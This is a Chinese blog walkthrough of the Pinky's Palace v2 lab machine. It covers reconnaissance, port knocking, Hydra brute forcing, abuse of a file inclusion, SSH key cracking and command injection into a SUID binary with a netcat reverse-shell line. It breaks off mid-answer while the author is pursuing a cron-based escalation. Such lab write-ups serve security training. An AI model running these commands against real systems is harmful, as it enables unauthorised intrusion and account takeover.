{"id":381,"date":"2024-05-11T23:16:49","date_gmt":"2024-05-11T15:16:49","guid":{"rendered":"http:\/\/xiyu12.top\/?p=381"},"modified":"2024-05-11T23:16:49","modified_gmt":"2024-05-11T15:16:49","slug":"pinkys-palace-v2","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=381","title":{"rendered":"PINKY’S PALACE: V2"},"content":{"rendered":"\n

\u51fd\u6570\u8c03\u7528\u6808\u5206\u6790 – \u77e5\u4e4e (zhihu.com)<\/a><\/p>\n\n\n\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n

\u6839\u636e\u63d0\u793a \u6dfb\u52a0\u4e00\u4e2a\u57df\u540d\u5230 \/etc\/hosts <\/p>\n\n\n\n

echo “192.168.1.150 pinkydb” | sudo tee -a \/etc\/hosts<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-12 08:44 CST\nNmap scan report for pinkydb (192.168.1.150)\nHost is up (0.00036s latency).\n\nPORT      STATE    SERVICE VERSION\n80\/tcp    open     http    Apache httpd 2.4.25 ((Debian))\n|_http-generator: WordPress 4.9.4\n|_http-title: Pinky&#039;s Blog &#8211; Just another WordPress site\n|_http-server-header: Apache\/2.4.25 (Debian)\n4655\/tcp  filtered unknown\n7654\/tcp  filtered unknown\n31337\/tcp filtered Elite\nMAC Address: 00:0C:29:15:EC:FE (VMware)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.02 seconds\n\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-12 08:44 CST\nNmap scan report for pinkydb (192.168.1.150)\nHost is up (0.00036s latency).\n\nPORT      STATE    SERVICE VERSION\n80\/tcp    open     http    Apache httpd 2.4.25 ((Debian))\n|_http-generator: WordPress 4.9.4\n|_http-title: Pinky&#039;s Blog &#8211; Just another WordPress site\n|_http-server-header: Apache\/2.4.25 (Debian)\n4655\/tcp  filtered unknown\n7654\/tcp  filtered unknown\n31337\/tcp filtered Elite\nMAC Address: 00:0C:29:15:EC:FE (VMware)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.02 seconds\n\n\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
sudo nmap --script=vuln -p 80,4655,7654,31337 192.168.1.150\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-12 08:45 CST\nNmap scan report for pinkydb (192.168.1.150)\nHost is up (0.00034s latency).\n\nPORT      STATE    SERVICE\n80\/tcp    open     http\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=pinkydb\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/pinkydb:80\/\n|     Form id: search-form-6640112d97834\n|     Form action: http:\/\/pinkydb\/\n|     \n|     Path: http:\/\/pinkydb:80\/wp-login.php\n|     Form id: loginform\n|     Form action: http:\/\/pinkydb\/wp-login.php\n|     \n|     Path: http:\/\/pinkydb:80\/?cat=1\n|     Form id: search-form-6640112f497e1\n|     Form action: http:\/\/pinkydb\/\n|     \n|     Path: http:\/\/pinkydb:80\/?m=201803\n|     Form id: search-form-6640112fb0bf8\n|     Form action: http:\/\/pinkydb\/\n|     \n|     Path: http:\/\/pinkydb:80\/?p=1\n|     Form id: commentform\n|     Form action: http:\/\/pinkydb\/wp-comments-post.php\n|     \n|     Path: http:\/\/pinkydb:80\/?p=1\n|     Form id: search-form-664011307f161\n|     Form action: http:\/\/pinkydb\/\n|     \n|     Path: http:\/\/pinkydb:80\/?p=4\n|     Form id: commentform\n|     Form action: http:\/\/pinkydb\/wp-comments-post.php\n|     \n|     Path: http:\/\/pinkydb:80\/?p=4\n|     Form id: search-form-66401130b2e91\n|     Form action: http:\/\/pinkydb\/\n|     \n|     Path: http:\/\/pinkydb:80\/wp-login.php?action=lostpassword\n|     Form id: lostpasswordform\n|_    Form action: http:\/\/pinkydb\/wp-login.php?action=lostpassword\n|_http-dombased-xss: Couldn't find any DOM based XSS.\n| http-enum: \n|   \/wp-login.php: Possible admin folder\n|   \/readme.html: WordPress version: 2 \n|   \/: WordPress version: 4.9.4\n|   \/wp-includes\/images\/rss.png: WordPress version 2.2 found.\n|   \/wp-includes\/js\/jquery\/suggest.js: WordPress version 2.5 found.\n|   \/wp-includes\/images\/blank.gif: WordPress version 2.6 found.\n|   \/wp-includes\/js\/comment-reply.js: WordPress version 2.7 found.\n|   \/wp-login.php: WordPress login page.\n|   \/wp-admin\/upgrade.php: WordPress login page.\n|_  \/readme.html: Interesting, a readme.\n4655\/tcp  filtered unknown\n7654\/tcp  filtered unknown\n31337\/tcp filtered Elite\nMAC Address: 00:0C:29:15:EC:FE (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 51.35 seconds\n<\/code><\/pre>\n\n\n\n
80\u7aef\u53e3  \u6709wordpress  <\/p>\n\n\n\n
4655 \u672a\u5f00\u542f<\/p>\n\n\n\n
31337 \u672a\u5f00\u542f<\/p>\n\n\n\n
7654 \u6ca1\u6709\u6253\u5f00<\/p>\n\n\n\n
wpscan –url http:\/\/pinkydb\/ -e u  \u626b\u63cf\u7528\u6237  <\/p>\n\n\n\n
pinky1337<\/code><\/pre>\n\n\n\n
wpscan –url http:\/\/pinkydb\/ –api-token xxxxxxxxxxxxxxxx -e vp –plugins-detection aggressive<\/p>\n\n\n\n
\u626b\u63cf\u63d2\u4ef6\u6f0f\u6d1e  \u6ca1\u6709<\/p>\n\n\n\n
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)\n Checking Known Locations - Time: 00:00:13 <========> (7344 \/ 7344) 100.00% Time: 00:00:13\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] No plugins Found.\n<\/code><\/pre>\n\n\n\n
\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n
gobuster dir -u http:\/\/192.168.1.150 –wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.html,.php<\/p>\n\n\n\n
gobuster dir -u  http:\/\/192.168.1.150 --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.html,.php\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.1.150\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 293]\n\/.php                 (Status: 403) [Size: 292]\n\/index.php            (Status: 301) [Size: 0] [--> http:\/\/192.168.1.150\/]\n\/wp-content           (Status: 301) [Size: 319] [--> http:\/\/192.168.1.150\/wp-content\/]\n\/wordpress            (Status: 301) [Size: 318] [--> http:\/\/192.168.1.150\/wordpress\/]\n\/wp-login.php         (Status: 200) [Size: 2239]\n\/license.txt          (Status: 200) [Size: 19935]\n\/wp-includes          (Status: 301) [Size: 320] [--> http:\/\/192.168.1.150\/wp-includes\/]\n\/readme.html          (Status: 200) [Size: 7413]\n\/secret               (Status: 301) [Size: 315] [--> http:\/\/192.168.1.150\/secret\/]\n\/wp-trackback.php     (Status: 200) [Size: 135]\n\/wp-admin             (Status: 301) [Size: 317] [--> http:\/\/192.168.1.150\/wp-admin\/]\n<\/code><\/pre>\n\n\n\n
\u8bbf\u95ee  http:\/\/192.168.1.150\/secret\/  \u53d1\u73b0\u4e00\u4e2a\u6587\u4ef6  bambam.txt<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u83b7\u5f97\u4fe1\u606f <\/p>\n\n\n\n
8890\n7000\n666\npinkydb<\/code><\/pre>\n\n\n\n
\u4e09\u4e2a\u6570\u5b57  \u53ef\u80fd\u662f knock  \u7aef\u53e3\u6572\u51fb  \u7684\u7aef\u53e3<\/p>\n\n\n\n
knock  192.168.1.150 8890 7000 666    \u53d1\u73b0\u5e76\u6ca1\u6709\u53d8\u5316<\/p>\n\n\n\n
\u7aef\u53e3\u7684\u987a\u5e8f\u4e0d\u540c \u5bf9\u4e8e\u6548\u679c\u6709\u5f71\u54cd<\/p>\n\n\n\n
\u4f7f\u7528 \u811a\u672c\u5bf9knock \u7684\u4e0d\u540c\u7aef\u53e3\u7ec4\u5408\u8fdb\u884c\u679a\u4e3e<\/p>\n\n\n\n
vim kn.sh\n#!\/bin\/bash\nfor i in 8890 7000 666\ndo\n    for j in 8890 7000 666\n    do\n        for k in 8890 7000 666\n        do\n            if [ $i -ne $j ] && [ $j -ne $k ] && [ $i -ne $k ]; then\n                knock 192.168.1.150 $i $j $k;\n            fi\n        done\n    done\ndone\n<\/code><\/pre>\n\n\n\n
\u8fd0\u884c\u811a\u672c\u4e4b\u540e\u53d1\u73b0\u4e0a\u9762\u5173\u95ed\u7684\u7aef\u53e3\u90fd\u6253\u5f00\u4e86<\/p>\n\n\n\n
sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-12 09:06 CST\nNmap scan report for pinkydb (192.168.1.150)\nHost is up (0.00063s latency).\n\nPORT      STATE SERVICE VERSION\n80\/tcp    open  http    Apache httpd 2.4.25 ((Debian))\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-generator: WordPress 4.9.4\n|_http-title: Pinky&#039;s Blog &#8211; Just another WordPress site\n4655\/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)\n| ssh-hostkey: \n|   2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)\n|   256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)\n|_  256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)\n7654\/tcp  open  http    nginx 1.10.3\n|_http-title: Pinkys Database\n|_http-server-header: nginx\/1.10.3\n31337\/tcp open  Elite?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|   GetRequest: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|     HTTP\/1.0\n|   HTTPOptions: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|     OPTIONS \/ HTTP\/1.0\n|   Help: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|     HELP\n|   RTSPRequest: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|     OPTIONS \/ RTSP\/1.0\n|   SIPOptions: \n|     [+] Welcome to The Daemon [+]\n|     This is soon to be our backdoor\n|     into Pinky's Palace.\n|     OPTIONS sip:nm SIP\/2.0\n|     Via: SIP\/2.0\/TCP nm;branch=foo\n|     From: <sip:nm@nm>;tag=root\n|     <sip:nm2@nm2>\n|     Call-ID: 50000\n|     CSeq: 42 OPTIONS\n|     Max-Forwards: 70\n|     Content-Length: 0\n|     Contact: <sip:nm@nm>\n|_    Accept: application\/sdp\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port31337-TCP:V=7.94SVN%I=7%D=5\/12%Time=6640162D%P=x86_64-pc-linux-gnu%\nSF:r(NULL,59,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0This\\x\nSF:20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoor\\n\\0into\\x20Pinky's\\x20Palac\nSF:e\\.\\n=>\\x20\\0\")%r(GetRequest,6B,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Daem\nSF:on\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoor\\n\\0in\nSF:to\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0GET\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\")%r(SI\nSF:POptions,138,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0Thi\nSF:s\\x20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoor\\n\\0into\\x20Pinky's\\x20Pa\nSF:lace\\.\\n=>\\x20\\0OPTIONS\\x20sip:nm\\x20SIP\/2\\.0\\r\\nVia:\\x20SIP\/2\\.0\/TCP\\x\nSF:20nm;branch=foo\\r\\nFrom:\\x20<sip:nm@nm>;tag=root\\r\\nTo:\\x20<sip:nm2@nm2\nSF:>\\r\\nCall-ID:\\x2050000\\r\\nCSeq:\\x2042\\x20OPTIONS\\r\\nMax-Forwards:\\x2070\nSF:\\r\\nContent-Length:\\x200\\r\\nContact:\\x20<sip:nm@nm>\\r\\nAccept:\\x20appli\nSF:cation\/sdp\\r\\n\\r\\n\")%r(GenericLines,5D,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\\nSF:x20Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoo\nSF:r\\n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0\\r\\n\\r\\n\")%r(HTTPOptions,6F,\"\nSF:\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soo\nSF:n\\x20to\\x20be\\x20our\\x20backdoor\\n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\x20\nSF:\\0OPTIONS\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\")%r(RTSPRequest,6F,\"\\[\\+\\]\\x20Welco\nSF:me\\x20to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x\nSF:20our\\x20backdoor\\n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0OPTIONS\\x20\/\\\nSF:x20RTSP\/1\\.0\\r\\n\\r\\n\")%r(RPCCheck,5A,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x2\nSF:0Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoor\\\nSF:n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0\\x80\")%r(DNSVersionBindReqTCP,5\nSF:9,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20\nSF:soon\\x20to\\x20be\\x20our\\x20backdoor\\n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\\nSF:x20\\0\")%r(DNSStatusRequestTCP,59,\"\\[\\+\\]\\x20Welcome\\x20to\\x20The\\x20Dae\nSF:mon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x20our\\x20backdoor\\n\\0i\nSF:nto\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0\")%r(Help,5F,\"\\[\\+\\]\\x20Welcome\\x20\nSF:to\\x20The\\x20Daemon\\x20\\[\\+\\]\\n\\0This\\x20is\\x20soon\\x20to\\x20be\\x20our\\\nSF:x20backdoor\\n\\0into\\x20Pinky's\\x20Palace\\.\\n=>\\x20\\0HELP\\r\\n\");\nMAC Address: 00:0C:29:15:EC:FE (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.20 seconds\n                                                             <\/code><\/pre>\n\n\n\n
4655 ssh\u670d\u52a1<\/p>\n\n\n\n
31337   \u7f51\u7edc\u670d\u52a1<\/p>\n\n\n\n
7654   nginx \u7f51\u9875\u670d\u52a1<\/p>\n\n\n\n
\u5bf9nginx \u8fdb\u884c\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n
gobuster dir -u  http:\/\/pinkydb:7654 --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.html,.php\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/pinkydb:7654\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 134]\n\/login.php            (Status: 200) [Size: 545]\n\/config.php           (Status: 200) [Size: 0]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n\n\u6ca1\u4ec0\u4e48\u4e1c\u897f<\/code><\/pre>\n\n\n\n
\u4f7f\u7528\u548chttp:\/\/192.168.1.150:7654\/\u65e0\u6cd5\u8bbf\u95ee<\/p>\n\n\n\n
\u4f7f\u7528 http:\/\/pinkydb:7654\/login.php\u8bbf\u95ee\u53ef\u4ee5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n
\u6709\u4e00\u4e2a\u767b\u9646\u5165\u53e3<\/p>\n\n\n\n
\u4f7f\u7528sqlmap\u8fdb\u884c\u6d4b\u8bd5  \u6ca1\u6709\u6210\u679c<\/p>\n\n\n\n
sqlmap -u http:\/\/pinkydb:7654\/login.php --dbms=mysql  --data=\"user=adm&pass=passw\" -dbs  --level=5 --risk=3 --tamper=space2comment\n<\/code><\/pre>\n\n\n\n
\u8fdb\u884c\u7206\u7834   \u5148\u6784\u9020 user\u6587\u4ef6<\/p>\n\n\n\n
\/config.php<\/code><\/pre>\n\n\n\n
cat user
pinkydb
pinky
pinky1337<\/p>\n\n\n\n
\u7136\u540e\u6784\u9020pass\u6587\u4ef6<\/p>\n\n\n\n
  cewl http:\/\/pinkydb\/ -w 2\n  cewl http:\/\/pinkydb:7654 -w 1\n  cat 1 | tee -a  2\n<\/code><\/pre>\n\n\n\n
\u8fdb\u884c\u7206\u7834<\/p>\n\n\n\n
 hydra -L .\/user -P .\/2 http-post-form:\/\/pinkydb:7654\/login.php:\"user=^USER^&pass=^PASS^\":\"Invalid Username or Password\\!\"
Hydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-05-12 09:31:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 712 login tries (l:4\/p:178), ~45 tries per task
[DATA] attacking http-post-form:\/\/pinkydb:7654\/login.php:user=^USER^&pass=^PASS^:Invalid Username or Password!
[7654][http-post-form] host: pinkydb   login: pinky   password: Passione
1 of 1 target successfully completed, 1 valid password found
Hydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-05-12 09:31:51
<\/code><\/pre>\n\n\n\n
\u83b7\u5f97\u4e00\u4e2a\u51ed\u8bc1  \u5728nginx\u8fdb\u884c\u767b\u9646<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u767b\u9646\u4e4b\u540e\u53d1\u73b0\u6709\u4e00\u4e2a\u7c7b\u4f3c\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u7684\u94fe\u63a5  \u548cstefano \u7684ssh\u79c1\u94a5  \u4e0b\u8f7d\u79c1\u94a5<\/p>\n\n\n\n
chmod 600 id_rsa\nssh -i id_rsa stefano@192.168.1.150 -p 4655\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0644 for 'id_rsa' are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key \"id_rsa\": bad permissions\nstefano@192.168.1.150's password: \n<\/code><\/pre>\n\n\n\n
\u9700\u8981\u5bc6\u7801  \u4f7f\u7528 ssh2john \u8f6c\u6362\u4e3ajohn \u53ef\u4ee5\u5904\u7406\u7684\u5f62\u5f0f \u7136\u540e\u4f7f\u7528john \u7834\u89e3<\/p>\n\n\n\n
ssh2john id_rsa >> rr   \n john --wordlist=\/usr\/share\/wordlists\/rockyou.txt rr\njohn --show   rr            #\u7834\u89e3\u8fc7\u4e00\u6b21\u7684\u6587\u4ef6 \u53ef\u4ee5\u4f7f\u7528--show  \u663e\u793a\u7834\u89e3\u7684\u5185\u5bb9                                 \nid_rsa:secretz101\n1 password hash cracked, 0 left\n<\/code><\/pre>\n\n\n\n
ssh -i id_rsa stefano@192.168.1.150 -p 4655 \u767b\u9646\u6210\u529f  shell\u83b7\u5f97 stefano<\/code><\/pre>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n
stefano@Pinkys-Palace:~$ ls\ntools\nstefano@Pinkys-Palace:~$ cd tools\nstefano@Pinkys-Palace:~\/tools$ ls\nnote.txt  qsub\nstefano@Pinkys-Palace:~\/tools$ cat note.txt\nPinky made me this program so I can easily send messages to him.\n<\/code><\/pre>\n\n\n\n
stefano@Pinkys-Palace:~\/tools$ ls -al\ntotal 28\ndrwxr-xr-x 2 stefano stefano   4096 Mar 17  2018 .\ndrwxr-xr-x 4 stefano stefano   4096 May 11 00:17 ..\n-rw-r--r-- 1 stefano stefano     65 Mar 16  2018 note.txt\n-rwsr----x 1 pinky   www-data 13384 Mar 16  2018 qsub\nstefano@Pinkys-Palace:~\/tools$ strings qsub\nstrings: qsub: Permission denied\nstefano@Pinkys-Palace:~\/tools$ \n<\/code><\/pre>\n\n\n\n
\u53d1\u73b0\u6709\u4e00\u4e2a \u53ef\u7591\u6587\u4ef6  \u4f46\u662f\u6ca1\u6709\u6743\u9650\u8bbf\u95ee   pinky   www-data 13384 Mar 16  2018 qsub<\/p>\n\n\n\n
www-data \u53ef\u4ee5\u8bbf\u95ee  \u53ef\u4ee5\u4f7f\u7528\u4e0a\u9762\u90a3\u4e2a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u628a\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n
curl http:\/\/pinkydb:7654\/pageegap.php?1337=\/home\/stefano\/tools\/qsub -o qsub1<\/p>\n\n\n\n
strings qsub                                               \n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\nexit\n__isoc99_scanf\nputs\nstrlen\nsend\nsetresgid\nasprintf\ngetenv\nsetresuid\nsystem\ngetegid\ngeteuid\n__cxa_finalize\nstrcmp\n__libc_start_main\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_Jv_RegisterClasses\n_ITM_registerTMCloneTable\nGLIBC_2.7\nGLIBC_2.2.5\nAWAVA\nAUATL\n[]A\\A]A^A_\n\/bin\/echo %s >> \/home\/pinky\/messages\/stefano_msg.txt\n%s <Message>\nTERM\n[+] Input Password: \nBad hacker! Go away!\n[+] Welcome to Question Submit!\n[!] Incorrect Password!\n;*3$\"\nGCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516\n<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u53ef\u4ee5\u770b\u5230  \/bin\/echo %s >> \/home\/pinky\/messages\/stefano_msg.txt  <\/p>\n\n\n\n
\u518d\u6839\u636e \u4e0a\u9762\u7684\u63d0\u793a   Pinky made me this program so I can easily send messages to him.<\/p>\n\n\n\n
stefano \u4f1a\u5411 pinky \u5199\u5165\u4fe1\u606f  \u6b63\u662f \u901a\u8fc7\u4e0a\u9762\u7684\u8bed\u53e5<\/p>\n\n\n\n
\u6211\u4eec \u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a %s  \u5411\u8fd9\u6761\u547d\u4ee4\u4e2d\u5199\u5165\u6211\u4eec\u6784\u9020\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n
\u53e6\u5916\u4e00\u63d0\uff0csuid bit \u5176\u5b9e\u8bbe\u7f6e\u7684\u662feuid\uff0c\u4e0d\u662fuid\u3002\u5e76\u4e0d\u662f\u771f\u6b63\u610f\u4e49\u4e0a\u7684pinky\u7528\u6237\uff0c\u53ea\u662f\u7a0b\u5e8f\u8fd0\u884c\u65f6\u4e34\u65f6\u501f\u7528pinky\u6743\u9650\u3002<\/p>\n\n\n\n
\uff0c\u8fd9\u91cc\u5982\u679c\u62fc\u63a5bash -p\u867d\u7136\u53ef\u4ee5\u4fdd\u7559euid\uff0c\u62ff\u5230pinky\u7528\u6237\u6743\u9650\uff0c\u53ef\u4ee5cd\u5207\u6362\u76ee\u5f55\u4f46\u662f\u8f93\u5165\u547d\u4ee4\u4f1a\u65e0\u540e\u7eed\u56de\u663e\u3002\u5982\u679c\u62fc\u63a5\u53cd\u5f39shell\u5c31\u6b63\u5e38<\/p>\n\n\n\n
.\/qsub '`nc -nv 192.168.1.138 1234 -e \/bin\/bash`'\n\u53d1\u73b0\u9700\u8981\u8f93\u5165\u5bc6\u7801\n\u4f7f\u7528 ghidra \u53cd\u7f16\u8bd1\u4e00\u4e0b \u53d1\u73b0\u662fgetenv\uff08\uff09\u7684\u503c\n\u8f93\u5165  xterm-256color\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u83b7\u5f97\u4e00\u4e2ashell  \u767b\u9646pinky<\/p>\n\n\n\n
pinky@Pinkys-Palace:\/home\/pinky$ cat .bash_history\ncat .bash_history\nls -al\ncd\nls -al\ncd \/usr\/local\/bin\nls -al\nvim backup.sh \nsu demon\npinky@Pinkys-Palace:\/home\/pinky$ cd \/usr\/local\/bin\ncd \/usr\/local\/bin\npinky@Pinkys-Palace:\/usr\/local\/bin$ ls\nls\nbackup.sh\npinky@Pinkys-Palace:\/usr\/local\/bin$ \n\n\u53d1\u73b0\u4e00\u4e2abackup.sh  -rwxrwx---  1 demon pinky   59 May 11 01:31 backup.sh\n\u53ef\u4ee5\u5199\u5165  \u611f\u89c9\u662f\u4e00\u4e2a\u8ba1\u5212\u4efb\u52a1  \u5199\u5165\u53cd\u5f39shell\u8bd5\u8bd5\n<\/code><\/pre>\n\n\n\n
cat: backup.sh: Permission denied \u6ca1\u6709\u6743\u9650  \u975e\u5e38\u5947\u602a  <\/p>\n\n\n\n
\u67e5\u4e00\u4e0bchatgpt<\/p>\n\n\n\n
 -rwxrwx---  1 demon pinky   59 May 11 01:31 backup.sh  \u5f53\u6211\u662f pinky \u65f6  cat: backup.sh: Permission denied\n\u4e3a\u4ec0\u4e48\uff1f\n\nChatGPT\n\u5728Linux\u7cfb\u7edf\u4e2d\uff0c\u6587\u4ef6\u7684\u6743\u9650\u7531\u4e09\u4e2a\u4e3b\u8981\u90e8\u5206\u7ec4\u6210\uff1a\u6240\u6709\u8005\u6743\u9650\u3001\u6240\u5c5e\u7ec4\u6743\u9650\u548c\u5176\u4ed6\u7528\u6237\u6743\u9650\u3002\u5728\u4f60\u7ed9\u51fa\u7684\u6587\u4ef6\u6743\u9650\u4e2d -rwxrwx--- 1 demon pinky 59 May 11 01:31 backup.sh\uff1a\n\n\u6240\u6709\u8005\u662f demon\n\u6240\u5c5e\u7ec4\u662f pinky\n\u5176\u4ed6\u7528\u6237\u6ca1\u6709\u4efb\u4f55\u6743\u9650\n\u56e0\u6b64\uff0c\u53ea\u6709\u6587\u4ef6\u7684\u6240\u6709\u8005 demon \u548c\u6240\u5c5e\u7ec4 pinky \u80fd\u591f\u8bbf\u95ee\u8fd9\u4e2a\u6587\u4ef6\u3002\u5f53\u4f60\u4ee5 pinky \u7528\u6237\u8eab\u4efd\u5c1d\u8bd5\u6267\u884c cat backup.sh \u547d\u4ee4\u65f6\uff0c\u56e0\u4e3a\u4f60\u5c5e\u4e8e\u6587\u4ef6\u6240\u5c5e\u7ec4 pinky\uff0c\u4f60\u5e94\u8be5\u53ef\u4ee5\u8bfb\u53d6\u8fd9\u4e2a\u6587\u4ef6\u3002\u4f46\u662f\u5982\u679c\u4f60\u78b0\u5230\u4e86 \"Permission denied\" 